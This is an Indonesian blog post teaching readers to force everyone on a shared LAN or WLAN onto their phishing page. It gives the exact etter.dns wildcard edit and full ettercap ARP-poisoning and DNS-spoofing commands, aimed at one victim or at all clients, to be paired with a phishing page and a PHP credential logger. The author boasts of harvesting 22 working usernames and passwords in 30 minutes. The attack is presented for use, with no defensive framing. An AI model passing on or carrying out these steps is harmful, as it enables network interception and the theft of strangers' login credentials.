Indonesian Blogger

Banner iskaruji dot com

Senin, 06 Februari 2012

0 Membuat halaman phishing diakses banyak orang

Membuat halaman phishing diakses banyak orang
Eeeeh, serius lho.. Kali ini saya mau jelasin gimana caranya membuat halaman phising kalian diakses banyak orang tanpa harus menyebarkan spam ke email, atau menyebarkan link lewat jejaring sosial..

Langsung aja nih saya kasih tau caranya.. Oh ya, tutorial ini saya buat khusus pengguna linux, dalam hal ini saya menggunakan backtrack 5 GNOME 32..

Briefing:
Pastikan kamu memiliki:
1. phishing page.html
2. coding pencatat kode.php
3. software apache2
4. ettercap


Tutorial:

Install apache2 terlebih dahulu, kemudian biarkan apache berjalan. Untuk menguji keberhasilan, buka browser internet, lalu ketik IP address kamu di address bar. Kalau keluar pesan berhasil, berarti konfigurasi apache kamu sudah benar.

Langkah selanjutnya adalah membuat orang-0rang dalam satu LAN atau WLAN mengakses phishing page kamu, dan membuatnya TIDAK BISA BERANJAK KEMANA-MANA.

Maksudnya, apapun alamat yang ia ketik di address bar, mereka akan terus ditampilkan halaman phishing kita. Lho, kok bisa? Ini yang disebut MITM dns spoofing. Caranya gimana?

Mudah, kali ini kita pakai software untuk menjalankan MITM, yaitu Ettercap.
Buka terminal, dan ketik (sudo gedit /usr/share/ettercap/etter.dns)
 
Hapus semua tulisan, dan ganti menjadi (* A [IP Address kamu] )
 
Contoh, jika IP address kamu 192.168.1.10, maka ubah menjadi (* A 192.168.1.10)
 
 
Kemudian save file etter.dn tersebut. Dan tahap terakhir adalah eksekusi dns spoofing. Cara kerjanya sederhana, ettercap mengirim paket yang berisi DNS, meracuni setiap paket, kamudian membawa perintah yang salah kepada klien sebuah LAN atau WLAN. DNS yang tadinya ditetapkan oleh server, kini dikendalikan 100% oleh kita, bahkan kita juga mengendalikan server. wakakawakaka

Ayooo, langsung ketik perintah ini untuk mengeksekusi dns spoofing 
(ettercap -i [interface] [mode] [option] /target 1/ /target 2/)  
 

Bingung? Begini, jika kamu menggunakan nirkabel untuk mengakses jaringan kerja, maka interface kamu adalah wlan0. Jadi perintahnya menjadi seperti ini (ettercap -i wlan0 [mode] [option] /target 1/ /target 2/)
 
Lalu apa yang dimaksud dengan mode? Ada 3 mode yang disediakan oleh ettercap. Mode konsol dengan tampilan, mode GUI, dan mode text. Untuk mode Text, maka kita menambahkan perintah menjadi seperti ini (ettercap -i wlan0 -T [option] /target 1/ target2/)
 
Nahhh, kalau option apa? Option itu perintah tambahan untuk ettercap, jadi ngga sekedar sniffing aja, bisa MITM, arpspoof, dns spoof, dan lain-lain. Pada kasus kali ini, kita akan menggunakan MITM dan dns spoof. Maka perintahnya menjadi seperti ini (ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /target 1/ /target 2/)
 
Keterangan:
-q menjelaskan opsi quiet, atau senyap.
-M menjelaskan opsi MITM attack
-P menjelaskan plug in ettercap

Lalu bagaimana dengan target? Kalau target kamu cuma satu orang, dan orang tersebut memiliki IP 192.168.1.2, dan server memiliki IP 192.168.1.1, maka masukan perintah berikut (ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.2/)
 

Kalo semua klien mau di spoof gimana? Gampang, masukan aja perintah ini (ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE // //)
 
 
Selesai deh, tinggal tunggu 10-20 menit untuk memanen hasil :D
Dalam 30 menit, saya dapat 22 username dan password yang berbeda, dan semuanya berfungsi (bisa login pake username dan password tersebut)
Oh ya, kalau semua klien di spoof, kamu juga ngga bisa kemana-mana lho :D

Jangan lupa kasih rating ya? ;)       

0 komentar:

-::DESCRIPTION
-::DATE
Diberdayakan oleh Blogger.